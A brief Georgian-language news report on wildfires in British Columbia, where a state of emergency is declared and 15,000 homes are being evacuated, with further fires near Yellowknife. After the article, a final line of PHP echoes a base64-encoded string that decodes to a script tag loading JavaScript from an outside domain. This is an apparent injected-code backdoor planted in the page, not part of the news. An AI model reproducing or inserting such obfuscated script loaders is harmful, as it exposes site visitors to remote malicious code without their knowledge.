celsiusi
ავერსი საქკაბელი

კანადის ბრიტანეთის პროვინციაში ტყის ხანძრების გამო საგანგებო მდგომარეობა გამოცხადდა.

როგორც პრესკონფერენციაზე პროვინციის პრემიერმა დევიდ ებიმ განაცხადა, ბოლო 24 საათში ტყის ხანძრებან დაკავშირებით სიტუაცია მკვეთრად გაუარესდა. კერძოდ, პროვინციაში ბოლო დღე-ღამეში ხანძრის ფართობი 64 -დან 6 800 ჰექტრამდე გაიზარდა. 15 ათასი საცხოვრებელი სახლიდან მიმდინარეობს მოსახლეობის ევაკუაცია.

„ამ წუთებში ჩვენი პროვინციის ისტორიაში ტყის ხანძრების ყველაზე საშინელი სეზონის წინაშე ვართ. ამ უპრეცედენტო სიტუაციამ პიკს ამ საღამოს მიაღწია, ბოლო 24 საათში სიტუაცია საკმაოდ სწრაფად გაუარესდა“, – განაცხადა ბრიტანეთის კოლუმბიის პროვინციის პრემიერმა.

კანადაში ტყის ხანძარი ასევე მძვინვარებს კანადის ჩრდილო-დასავლეთ ტერიტორიებზე. ცეცხლი აღნიშნული რეგიონის ადმინისტრაციულ ცენტრს, ქალაქ იელოუნაიფს უახლოვდება, საიდანაც მიმდინარეობს მოსახლეობის ევაკუაცია.

337
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");